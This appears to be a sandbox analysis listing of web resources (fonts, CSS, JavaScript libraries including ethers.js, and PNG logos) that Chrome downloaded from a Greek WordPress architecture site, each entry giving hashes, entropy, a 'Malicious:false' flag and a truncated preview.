                                Preview:wOF2..............0L..............................=..r..2?HVAR.>.`?STATt?VVAR..../T....<.N....0....6.$.... ..(..T...$..f[Y!qA. ...z..$cj}..E.r...+..lD...................77.r....J8..H...Y5..x>..(_.....L.....Fl....R........n.a.....#\T.h`..7..7..0.pAx=.....:M2.4.Q.|.H7....'..X.T4../...Go3.\.o.G7..3.i]...Q..6....h..+.....i>.I.l..2>B.k.b.....t..w>`%..1.%.....\_.....9.%.B...&A.~..n..z..6.}....8..R......Q.[.i2u..w..8A..."N.L.d(...S@ED.. *..Y.zM.&1.Z.Yv$..qM....]I...5.O.z.tUW.....n..}.2...b........r....s.I....zx...$..Bi...h.81N..yO.w..S.....&F.J.B%.#.b...H...`....4..n&L...@..D?.?.W...7$..G].....q2vZ3..f..+$.=........4......y...p...>..y....L......w..h..H.J}.4...M.2o,..A6.MJ.C....w1..h...i$1H..BL.....}.Z...=.....m.._...f'n.....X.K.........0^...N...%....UR..Dq....~.dZ.......g...............-.?......z....a?...w.....BkGW.n.B.^..y............&..I.....D0.......!jSA.r.0..[7<..J5......da.aJ....0...7.....tS...c.&)...}.V...O..)..@w.....Hm.jb..-..p..'..@.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:Web Open Font Format (Version 2), TrueType, length 78472, version 331.-31327
                                Category:downloaded
                                Size (bytes):78472
                                Entropy (8bit):7.9970605394117245
                                Encrypted:true
                                SSDEEP:
                                MD5:0C9F225E8F69C622F681CF1ED973CC3D
                                SHA1:9E355ABDA14EE62A7987B2BA7E2E887D33337E25
                                SHA-256:529D0A7B3944929222155BCA3272BA1A87ACC2FAA09B2ED26A713872B7FF8794
                                SHA-512:AB6968D2E995E406148A50890CC48A0A1902C53C1F9DC97DDF76916FBF147631E3F9BD62F73D9B48A8F9060ABB7FB882FC5E629F2C8567DB994079FC4F4245A7
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/plugins/brok-core/inc/icons/font-awesome/assets/webfonts/fa-brands-400.woff2
                                Preview:wOF2......2........D..2..K......................?FFTM....`..r........'.6.$..0..... .....k[.q.....M.U......i.m......3..............B.v.....(J..V...G..U4..:..Ms..ZQ.....Rp...P.5B.....rP.."b+.....&tz3.$Ct1Dn..k...z...<...J..|..6.RV.D..G..1......W}.......g...m...7]2D2%C.L...G..r#..d.baA........K..K...F@.....i..g..>..Ab.o...LS.8zB.e.t...B......,.m....+....=........$....2.T...!DRc.2...y~9.......>23.r..D.vf"Xe$.O..R.Q..I.PE...b.J...@...pMlx~n....[3j.H..(kE..A..H..D..(...(.}..Q..}.w\.W^;C7.KXV.~....Q..!.H....j."f..rw=.d......n.}D...........i....ZsM.Jj.H)$B.&.........L...T..yz..x.......!3q.$p.Af..:.......3BM......;>.0.P.F. ...x~n...`k...K"7FDJ....&e`d.)V..W:oN...o...n'.m.......d).......... .`. mZUWg.8...y..Wp....}....|ij}..j..:..,..AqD1(:(..A..e.Y...p....._..I..$E.E.bv..2......w....C........O.....D......k._U.......8.%c.La(.....f..,....P. YQ. ...%S..].K...y!.<P.w.O.g.3...Z......../q^[...U.J.';n.P..2......(.U...}FD..rA.x...K...Qw..G..........0;..v. ...x..
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (59158)
                                Category:downloaded
                                Size (bytes):59344
                                Entropy (8bit):4.717036000951912
                                Encrypted:false
                                SSDEEP:
                                MD5:C4AF24CE595437830AF0A401897698B2
                                SHA1:06B7F92DD894A9EDB0AEB9D040B489460ECFF593
                                SHA-256:D1FB8D8337CD22568295B0ED998C85C58F0B4CD083AF0B0DB21CB0AF80002F2D
                                SHA-512:1CAE5F80B04BFB1BBA766FC88B7CF8C619525326604D3F6DB9CFE14ABB70EAECC93AF811AF66BD8F2C714F57A5CBE07EC4502624A5524DBA4CFC2B8BEEAC4EF3
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/plugins/brok-core/inc/icons/font-awesome/assets/css/all.min.css?ver=6.6.2
                                Preview:/*!. * Font Awesome Free 5.15.2 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */..fa,.fab,.fad,.fal,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:inline-block;font-style:normal;font-variant:normal;text-rendering:auto;line-height:1}.fa-lg{font-size:1.33333em;line-height:.75em;vertical-align:-.0667em}.fa-xs{font-size:.75em}.fa-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-fw{text-align:center;width:1.25em}.fa-ul{list-style-type:none;margin-left:2.5em;padding-left:0}.fa-ul>li{position:relative}.fa-li{left:-2em;position:absolute;text-align:center;width:2em;line-height:inherit}.fa-border{border:.08em solid #eee;border-radius:.1em;padding:.2em .25em .15em}.fa-pu
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text
                                Category:downloaded
                                Size (bytes):440
                                Entropy (8bit):4.843506047061996
                                Encrypted:false
                                SSDEEP:
                                MD5:182641CACE0DF0AFDCE9B492DDCFE515
                                SHA1:1B094B0B297F65ECC9C3A2A85B7D6C8482F24204
                                SHA-256:588432920C68B3D6381EF495BD80C6542EA42F21241D6227A092504130153A58
                                SHA-512:D0A17A929284B2D128A559D0FC4BDA382F432B2D36BA318BA2DB454298D64D958C11B61304B2BE25E845FE9AEFBC7267E2E41A4736FFA1F43EBD1F4FD3240A12
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/themes/brok/style.css?ver=6.6.2
                                Preview:/*.Theme Name: Brok.Theme URI: https://brok.qodeinteractive.com.Description: Architecture Theme.Author: Edge Themes.Author URI: https://qodeinteractive.com.Text Domain: brok.Tags: one-column, two-columns, three-columns, four-columns, left-sidebar, right-sidebar, custom-menu, featured-images, flexible-header, post-formats, sticky-post, threaded-comments, translation-ready.Version: 1.0.License URI: -.License: ThemeForest Split Licence.*/.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text
                                Category:downloaded
                                Size (bytes):47993
                                Entropy (8bit):5.4930700302465745
                                Encrypted:false
                                SSDEEP:
                                MD5:BE3561ADBA36B2681F9AD92C01385394
                                SHA1:016B3E73A31E92698F303F7F08CEB03FB8262548
                                SHA-256:F4718500601A7B328143C06DD7FE07FE7546253DCD7CEB5A6CF8105EEB52474E
                                SHA-512:570A8FA0EADE36E4CD840AC46B7584128069B332CBFCDBCC2247A0BAA7486C284F1948C5171935A95CF9C7B13EDA53914B6A2F368B513DC2602679D000486FC5
                                Malicious:false
                                Reputation:unknown
                                URL:https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CRoboto+Slab%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic&display=auto&ver=6.6.2
                                Preview:/* cyrillic-ext */.@font-face {. font-family: 'Roboto';. font-style: italic;. font-weight: 100;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOiCnqEu92Fr1Mu51QrEz0dL_nz.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Roboto';. font-style: italic;. font-weight: 100;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOiCnqEu92Fr1Mu51QrEzQdL_nz.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Roboto';. font-style: italic;. font-weight: 100;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOiCnqEu92Fr1Mu51QrEzwdL_nz.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Roboto';. font-style: italic;. font-weight: 100;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOiCnqEu92Fr1Mu51QrEzMdL_nz.woff2) format('woff2');. unicod
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                Category:downloaded
                                Size (bytes):505754
                                Entropy (8bit):5.626689701318195
                                Encrypted:false
                                SSDEEP:
                                MD5:F253B5C418CAD99E98743942B16AD623
                                SHA1:560979AEDF211D0DC8473AF9FC27B786746FA0F6
                                SHA-256:6B5FAEC26FD156352FF8387AA62E1D9DF2D0B7AF99BC81236308A98FE3F457E4
                                SHA-512:52FC01F76CA1CD6590B2D5D94F7D65D4573BC2FDEC446EEE58148567A4DE2742C87C17BCA0CF69DA8B9FA756399EE040B28F85607474DD6A1C1EBE7EC2A589EC
                                Malicious:false
                                Reputation:unknown
                                URL:https://cdnjs.cloudflare.com/ajax/libs/ethers/6.13.1/ethers.umd.min.js
                                Preview:const __$G=typeof globalThis!=="undefined"?globalThis:typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof self!=="undefined"?self:{};(function(global,factory){typeof exports==="object"&&typeof module!=="undefined"?factory(exports):typeof define==="function"&&define.amd?define(["exports"],factory):(global=typeof globalThis!=="undefined"?globalThis:global||self,factory(global.ethers={}))})(this,function(exports){"use strict";const version="6.13.1";function checkType(value,type,name){const types=type.split("|").map(t=>t.trim());for(let i=0;i<types.length;i++){switch(type){case"any":return;case"bigint":case"boolean":case"number":case"string":if(typeof value===type){return}}}const error=new Error(`invalid value for type ${type}`);error.code="INVALID_ARGUMENT";error.argument=`value.${name}`;error.value=value;throw error}async function resolveProperties(value){const keys=Object.keys(value);const results=await Promise.all(keys.map(k=>Promise.resolve(value[k])));return
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text
                                Category:downloaded
                                Size (bytes):569
                                Entropy (8bit):4.896633254731508
                                Encrypted:false
                                SSDEEP:
                                MD5:71D6A57D21337114032CA39B294F3591
                                SHA1:ADA1D867672276F16EF4D3B8A46A519FBA8E3D4E
                                SHA-256:36B2057EB5EEF261A2CBB8C149DCF3A11EDAA15CCD8E3D462EB34999F5FF8F2A
                                SHA-512:BC5F5B55C2741FED993D5D25A36030028C388C8888EA2D1D1F24970AEC4F856CDA366940B99D54FF2D4D9AF16DF8DE39AB847A7BA2BE0B649DE1CE2C9E70A330
                                Malicious:false
                                Reputation:unknown
                                URL:https://fonts.googleapis.com/icon?family=Material+Icons&ver=6.6.2
                                Preview:/* fallback */.@font-face {. font-family: 'Material Icons';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/materialicons/v142/flUhRq6tzZclQEJ-Vdg-IuiaDsNc.woff2) format('woff2');.}...material-icons {. font-family: 'Material Icons';. font-weight: normal;. font-style: normal;. font-size: 24px;. line-height: 1;. letter-spacing: normal;. text-transform: none;. display: inline-block;. white-space: nowrap;. word-wrap: normal;. direction: ltr;. -webkit-font-feature-settings: 'liga';. -webkit-font-smoothing: antialiased;.}.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:troff or preprocessor input, ASCII text
                                Category:downloaded
                                Size (bytes):2539
                                Entropy (8bit):5.017976193092075
                                Encrypted:false
                                SSDEEP:
                                MD5:750F5DDB4440943C63B8DC8995EEF9D3
                                SHA1:FC9B79A0DA2EDBF1D9EAFC8DE1D06AD4F2DCC5BE
                                SHA-256:F6ED8B07F6F3C0A37FF67B348523B922ADEF82D9D1DC6A0D6D0FD34C82E6A9D0
                                SHA-512:CE798A414AA6FA09551A147DC239EB2AD4689A25F6A2C74829D557854F397DA75DAB817E06502615E132C944B435CF653DCAEDA761A3FAAEFE3F85791E3E5D05
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/plugins/brok-core/assets/plugins/perfect-scrollbar/perfect-scrollbar.css?ver=6.6.2
                                Preview:/*. * Container style. */..ps {..overflow: hidden !important;..overflow-anchor: none;..-ms-overflow-style: none;..touch-action: auto;..-ms-touch-action: auto;.}../*. * Scrollbar rail styles. */..ps__rail-x {..display: none;..opacity: 0;..transition: background-color .2s linear, opacity .2s linear;..-webkit-transition: background-color .2s linear, opacity .2s linear;..height: 15px;../* there must be 'bottom' or 'top' for ps__rail-x */..bottom: 0px;../* please don't change 'position' */..position: absolute;.}...ps__rail-y {..display: none;..opacity: 0;..transition: background-color .2s linear, opacity .2s linear;..-webkit-transition: background-color .2s linear, opacity .2s linear;..width: 15px;../* there must be 'right' or 'left' for ps__rail-y */..right: 0;../* please don't change 'position' */..position: absolute;.}...ps--active-x > .ps__rail-x,..ps--active-y > .ps__rail-y {..display: block;..background-color: transparent;.}...ps:hover > .ps__rail-x,..ps:hover > .ps__rail-y,..ps--focu
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (2623)
                                Category:downloaded
                                Size (bytes):2729
                                Entropy (8bit):5.293097668134203
                                Encrypted:false
                                SSDEEP:
                                MD5:6C3115BED3EAE9252CA78DA319EF53EB
                                SHA1:FB8729A8047C82730B01F261FD6849C7BCCE9C08
                                SHA-256:3918B2CA23E3D9A59E89B65698EC18F174C904324C41F4F39738435C480E4173
                                SHA-512:DA7092AFFC96EFFA80EA8F21856E7C24D595C0FDD9CC9F50CD5331B2509B7D380FEE4261D16FF7A072A2D93A385DDD1032126BF6CDD30C1F22FDD4B225788E39
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/plugins/brok-core/assets/plugins/modernizr/modernizr.js?ver=6.6.2
                                Preview:/*! modernizr 3.6.0 (Custom Build) | MIT *. * https://modernizr.com/download/?-touchevents-setclasses !*/.!function(e,n,t){function o(e){var n=u.className,t=Modernizr._config.classPrefix||"";if(p&&(n=n.baseVal),Modernizr._config.enableJSClass){var o=new RegExp("(^|\\s)"+t+"no-js(\\s|$)");n=n.replace(o,"$1"+t+"js$2")}Modernizr._config.enableClasses&&(n+=" "+t+e.join(" "+t),p?u.className.baseVal=n:u.className=n)}function s(e,n){return typeof e===n}function a(){var e,n,t,o,a,i,r;for(var l in c)if(c.hasOwnProperty(l)){if(e=[],n=c[l],n.name&&(e.push(n.name.toLowerCase()),n.options&&n.options.aliases&&n.options.aliases.length))for(t=0;t<n.options.aliases.length;t++)e.push(n.options.aliases[t].toLowerCase());for(o=s(n.fn,"function")?n.fn():n.fn,a=0;a<e.length;a++)i=e[a],r=i.split("."),1===r.length?Modernizr[r[0]]=o:(!Modernizr[r[0]]||Modernizr[r[0]]instanceof Boolean||(Modernizr[r[0]]=new Boolean(Modernizr[r[0]])),Modernizr[r[0]][r[1]]=o),f.push((o?"":"no-")+r.join("-"))}}function i(){return"
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:Unicode text, UTF-8 text, with very long lines (38582), with no line terminators
                                Category:downloaded
                                Size (bytes):38590
                                Entropy (8bit):5.294651497536075
                                Encrypted:false
                                SSDEEP:
                                MD5:92F8C01350C630F414F5D0B015AD6864
                                SHA1:EAB40AB4E77F92F2FB17684AAF44B579A51B8034
                                SHA-256:17B79ECE7EF9D1454A90156690D33D64387B67A7A7548FC826012512E287A937
                                SHA-512:C2D619D5CBEC24AAA5DA29A80031ECE9EE65B949F38E00E75EF6EBFFA0A38B3FD3F32F271A941D3E0D1F001B90D0A30D3A9CF342E409FE3FB75AC47A3361FF9A
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
                                Preview:!function(r){"use strict";var t,e,n;e={},(n=function(r){if(e[r])return e[r].exports;var o=e[r]={i:r,l:!1,exports:{}};return t[r].call(o.exports,o,o.exports,n),o.l=!0,o.exports}).m=t=[function(r,t,e){e(1),e(70),e(77),e(80),e(81),e(83),e(95),e(96),e(98),e(101),e(103),e(104),e(113),e(114),e(117),e(123),e(138),e(140),e(141),r.exports=e(142)},function(r,t,e){var n=e(2),o=e(38),a=e(62),c=e(67),i=e(69);n({target:"Array",proto:!0,arity:1,forced:e(6)((function(){return 4294967297!==[].push.call({length:4294967296},1)}))||!function(){try{Object.defineProperty([],"length",{writable:!1}).push()}catch(r){return r instanceof TypeError}}()},{push:function(r){var t=o(this),e=a(t),n=arguments.length;i(e+n);for(var u=0;u<n;u++)t[e]=arguments[u],e++;return c(t,e),e}})},function(t,e,n){var o=n(3),a=n(4).f,c=n(42),i=n(46),u=n(36),f=n(54),s=n(66);t.exports=function(t,e){var n,p,l,y=t.target,h=t.global,v=t.stat,g=h?o:v?o[y]||u(y,{}):o[y]&&o[y].prototype;if(g)for(n in e){if(p=e[n],l=t.dontCallGetSet?(l=a(g,n)
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:PNG image data, 480 x 246, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):9396
                                Entropy (8bit):7.811127495165274
                                Encrypted:false
                                SSDEEP:
                                MD5:4A41CEB36A45FFE78F4383C5FE81C8D7
                                SHA1:29F0F59B8FB4958793DB60DC95A0BAE0818A5385
                                SHA-256:FC6AB4F787192F170BBCBA554F27B83AAAA4476C399C6478604B726FCC932542
                                SHA-512:071F8A89AF461FD80BC66D7F1307A7AF7B28253D5679126B678F3839BDF48A001B827F12F6D8D27CC50EAAA1FF4AC1FC3E294A6122877657026AFC0DF57C9CB1
                                Malicious:false
                                Reputation:unknown
                                Preview:.PNG........IHDR..............,T.....sRGB.........pHYs..,K..,K..=......iTXtXML:com.adobe.xmp.....<?xpacket begin='.' id='W5M0MpCehiHzreSzNTczkc9d'?>.<x:xmpmeta xmlns:x='adobe:ns:meta/'>.<rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>.. <rdf:Description rdf:about=''. xmlns:Attrib='http://ns.attribution.com/ads/1.0/'>. <Attrib:Ads>. <rdf:Seq>. <rdf:li rdf:parseType='Resource'>. <Attrib:Created>2022-04-15</Attrib:Created>. <Attrib:ExtId>5a9b36ca-5ee0-40f4-a0e8-964f8218c797</Attrib:ExtId>. <Attrib:FbId>525265914179580</Attrib:FbId>. <Attrib:TouchType>2</Attrib:TouchType>. </rdf:li>. </rdf:Seq>. </Attrib:Ads>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:pdf='http://ns.adobe.com/pdf/1.3/'>. <pdf:Author>The Creatives</pdf:Author>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:xmp='http://ns.adobe.com/xap/1.0/'>. <xmp:CreatorTool>Canva</xmp:CreatorTool>. </rdf:Description>.</rdf:RDF>.</x:xmpmeta>.<?xpacket end='r'?>
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (1191), with no line terminators
                                Category:dropped
                                Size (bytes):1191
                                Entropy (8bit):5.027775143359677
                                Encrypted:false
                                SSDEEP:
                                MD5:51300497928562F8C86C7AABA99237CD
                                SHA1:E5826832B85C6AFC6502B74CBB8AC5394B04C363
                                SHA-256:6D161E98E47AE150B51211443EEF37040FB6269DCF85AD2048548066DCA99E6F
                                SHA-512:04BFDF1A41712238902BC6A0E07EFAF356217E98560C52FA5D175C29191617C35853382CE2F69966BDD5E1B40114B872D962A5FAD26A9E0B7D4FC016A6DCB833
                                Malicious:false
                                Reputation:unknown
                                Preview:!function(a){void 0===mejs.plugins&&(mejs.plugins={},mejs.plugins.silverlight=[],mejs.plugins.silverlight.push({types:[]})),mejs.HtmlMediaElementShim=mejs.HtmlMediaElementShim||{getTypeFromFile:mejs.Utils.getTypeFromFile},void 0===mejs.MediaFeatures&&(mejs.MediaFeatures=mejs.Features),void 0===mejs.Utility&&(mejs.Utility=mejs.Utils);var e=MediaElementPlayer.prototype.init,t=(MediaElementPlayer.prototype.init=function(){this.options.classPrefix="mejs-",this.$media=this.$node=a(this.node),e.call(this)},MediaElementPlayer.prototype._meReady);MediaElementPlayer.prototype._meReady=function(){this.container=a(this.container),this.controls=a(this.controls),this.layers=a(this.layers),t.apply(this,arguments)},MediaElementPlayer.prototype.getElement=function(e){return void 0!==a&&e instanceof a?e[0]:e},MediaElementPlayer.prototype.buildfeatures=function(e,t,i,s){for(var l=["playpause","current","progress","duration","tracks","volume","fullscreen"],r=0,n=this.options.features.length;r<n;r++){var
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (1464)
                                Category:downloaded
                                Size (bytes):1499
                                Entropy (8bit):4.983141781132298
                                Encrypted:false
                                SSDEEP:
                                MD5:8C0498E2F1F7A684A8D2A3FEB934B64B
                                SHA1:76099689CCAEE466D4608DA621C403B368DCAE03
                                SHA-256:ED5B5DF9CEACFE76857AC51964972B0B417A215B2F50E837FD6B64BAD7339C40
                                SHA-512:5689B6B18071D6020A8A2733BB9E17C07960D9E65F4012CE93F21347FA24A24175509BCA6920FE1B03D66FBC054D718671C23071AF115B64000C01DFBEA2E8DD
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-includes/js/hoverIntent.min.js?ver=1.10.2
                                Preview:/*! This file is auto-generated */.!function(e){"use strict";"function"==typeof define&&define.amd?define(["jquery"],e):"object"==typeof module&&module.exports?module.exports=e(require("jquery")):jQuery&&!jQuery.fn.hoverIntent&&e(jQuery)}(function(f){"use strict";function u(e){return"function"==typeof e}var i,r,v={interval:100,sensitivity:6,timeout:0},s=0,a=function(e){i=e.pageX,r=e.pageY},p=function(e,t,n,o){if(Math.sqrt((n.pX-i)*(n.pX-i)+(n.pY-r)*(n.pY-r))<o.sensitivity)return t.off(n.event,a),delete n.timeoutId,n.isActive=!0,e.pageX=i,e.pageY=r,delete n.pX,delete n.pY,o.over.apply(t[0],[e]);n.pX=i,n.pY=r,n.timeoutId=setTimeout(function(){p(e,t,n,o)},o.interval)};f.fn.hoverIntent=function(e,t,n){function o(e){var u=f.extend({},e),r=f(this),v=((t=r.data("hoverIntent"))||r.data("hoverIntent",t={}),t[i]),t=(v||(t[i]=v={id:i}),v.timeoutId&&(v.timeoutId=clearTimeout(v.timeoutId)),v.event="mousemove.hoverIntent.hoverIntent"+i);"mouseenter"===e.type?v.isActive||(v.pX=u.pageX,v.pY=u.pageY,r.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (13425)
                                Category:downloaded
                                Size (bytes):13677
                                Entropy (8bit):5.279145225606813
                                Encrypted:false
                                SSDEEP:
                                MD5:24F21657C5465ED6E144FB4401350E07
                                SHA1:1A7B8F26E33FEABC257ECC8E954CC3F0E1F7AC60
                                SHA-256:906BA97C9E3365BE3F9B418F3D56349E0EC5C128D99B5134C0C586D5A4586F09
                                SHA-512:B824260286B1E9A253C42D375651F4B8212D13488B8BCDD35B5421E957B3119E58D7BAD3AC813EF22AF3E07E1E84CEC56DF6E6F2B6F7D0E931564BB0857C6B46
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/plugins/qi-addons-for-elementor/assets/plugins/swiper/swiper.min.css?ver=6.6.2
                                Preview:/**. * Swiper 5.4.5. * Most modern mobile touch slider and framework with hardware accelerated transitions. * http://swiperjs.com. *. * Copyright 2014-2020 Vladimir Kharlampidi. *. * Released under the MIT License. *. * Released on: June 16, 2020. */..@font-face{font-family:swiper-icons;src:url("data:application/font-woff;charset=utf-8;base64, d09GRgABAAAAAAZgABAAAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABGRlRNAAAGRAAAABoAAAAci6qHkUdERUYAAAWgAAAAIwAAACQAYABXR1BPUwAABhQAAAAuAAAANuAY7+xHU1VCAAAFxAAAAFAAAABm2fPczU9TLzIAAAHcAAAASgAAAGBP9V5RY21hcAAAAkQAAACIAAABYt6F0cBjdnQgAAACzAAAAAQAAAAEABEBRGdhc3AAAAWYAAAACAAAAAj//wADZ2x5ZgAAAywAAADMAAAD2MHtryVoZWFkAAABbAAAADAAAAA2E2+eoWhoZWEAAAGcAAAAHwAAACQC9gDzaG10eAAAAigAAAAZAAAArgJkABFsb2NhAAAC0AAAAFoAAABaFQAUGG1heHAAAAG8AAAAHwAAACAAcABAbmFtZQAAA/gAAAE5AAACXvFdBwlwb3N0AAAFNAAAAGIAAACE5s74hXjaY2BkYGAAYpf5Hu/j+W2+MnAzMYDAzaX6QjD6/4//Bxj5GA8AuRwMYGkAPywL13jaY2BkYGA88P8Agx4j+/8fQDYfA1AEBWgDAIB2BOoAeNpjYGRgYNBh4GdgYgABEMnIABJzYNADCQAACWgAsQB42mNgYfzCOIGBlYGB0Y
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:PNG image data, 97 x 45, 8-bit/color RGBA, non-interlaced
                                Category:downloaded
                                Size (bytes):2184
                                Entropy (8bit):7.490230055216253
                                Encrypted:false
                                SSDEEP:
                                MD5:9661F34A803D54A25CA8A892B0F8780A
                                SHA1:8C674DB2EC6AF3935E737462ECB3E272BA355AAF
                                SHA-256:1715BA4FE4E41724A143B1807AD33E350D3708CBD80FE3A0399C014F908E8A40
                                SHA-512:82ADFA01003B920EF3989FEFD7D02AA248BE84E115FC8DE1FFCE62020F58A4F5BBB0BD7FFDD0A3B64094EC6B4AF38D1253E767BCBE4C8AE8D878A024AA3A66F6
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/uploads/2021/11/side-area-logo.png
                                Preview:.PNG........IHDR...a...-.............tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:553935733C8E11ECA929D245E2AD4FAB" xmpMM:DocumentID="xmp.did:553935743C8E11ECA929D245E2AD4FAB"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:553935713C8E11ECA929D245E2AD4FAB" stRef:documentID="xmp.did:553935723C8E11ECA929D245E2AD4FAB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>........IDATx..\.oLQ.....J.B..C.!).j>:aa..........."....._ A......H....B4..>.qNz.gn..w..yo.N.K..7......s.&..*.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (11256), with no line terminators
                                Category:downloaded
                                Size (bytes):11256
                                Entropy (8bit):5.010537766861896
                                Encrypted:false
                                SSDEEP:
                                MD5:2B0DD7EECEA03B4BDEDB94BA622FDB03
                                SHA1:703BECBA85161118DD6FC66AF465428EF43F561C
                                SHA-256:B7908A015A567EC2363011DF2475368DBFF34360E9DA3FDFF50604D6395FB646
                                SHA-512:FE64CFF950921BDF83EC09FE79CA5CE52DE40F5B8788697EB1D7B28055F2817778347D5D3C81A324801C7EC7151B3EE0EEE99B2882C3C3B10BD760342D3BF3E7
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.17
                                Preview:.mejs-offscreen{border:0;clip:rect(1px,1px,1px,1px);-webkit-clip-path:inset(50%);clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-wrap:normal}.mejs-container{background:#000;font-family:Helvetica,Arial,serif;position:relative;text-align:left;text-indent:0;vertical-align:top}.mejs-container,.mejs-container *{box-sizing:border-box}.mejs-container video::-webkit-media-controls,.mejs-container video::-webkit-media-controls-panel,.mejs-container video::-webkit-media-controls-panel-container,.mejs-container video::-webkit-media-controls-start-playback-button{-webkit-appearance:none;display:none!important}.mejs-fill-container,.mejs-fill-container .mejs-container{height:100%;width:100%}.mejs-fill-container{background:transparent;margin:0 auto;overflow:hidden;position:relative}.mejs-container:focus{outline:none}.mejs-iframe-overlay{height:100%;position:absolute;width:100%}.mejs-embed,.mejs-embed body{background:#000;height:100%;margin:0;over
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:PNG image data, 300 x 45, 8-bit/color RGBA, non-interlaced
                                Category:downloaded
                                Size (bytes):16914
                                Entropy (8bit):7.952128886859885
                                Encrypted:false
                                SSDEEP:
                                MD5:52B6393D361179404720CEFCC1313053
                                SHA1:48EDD74EF59C5561CABC7CAC0D6460B9D3EA2F2E
                                SHA-256:C1AA033CDFE0B67EB2018E888A5E55DB23C848EA37E07DE80E92BBE593B4F2B4
                                SHA-512:0E7C2334212160F1D708BA32590D9DE0E11532AFEBBD3C52CA8072A10B31EBA03660A0D6E19C89A775070F7DACE377262B26AFB909BFEB00287303D10EB4B01B
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/uploads/2022/04/logo.png
